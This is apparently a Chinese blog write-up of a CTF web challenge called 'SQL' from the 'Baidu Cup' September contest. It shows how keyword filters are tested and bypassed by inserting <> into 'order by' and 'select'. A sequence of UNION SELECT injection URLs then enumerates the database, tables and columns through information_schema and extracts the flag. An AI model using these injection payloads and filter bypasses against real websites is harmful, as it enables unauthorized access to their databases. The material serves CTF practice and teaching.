当前位置：网站首页>“百度杯”CTF比赛九月场，Web：SQL

“百度杯”CTF比赛九月场，Web：SQL

2022-07-05 13:00:00 【Part 02】

题目内容：
出题人就告诉你这是个注入，有种别走！

看 URL

/index.php?id=1

测过滤

没有过滤： ' 空格 #
被过滤： order by，select

测能否绕过

/**/

1 ord/**/er by 3%23

1 ord<>er by 3%23 有回显
1 ord<>er by 4%23 无回显

?id=-1 union sel<>ect 1,2,3%23

?id=-1 union sel<>ect 1,database(),3%23

?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()%23

?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_schema=database()%23

?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info%23

版权声明
本文为[Part 02]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_62260856/article/details/125587909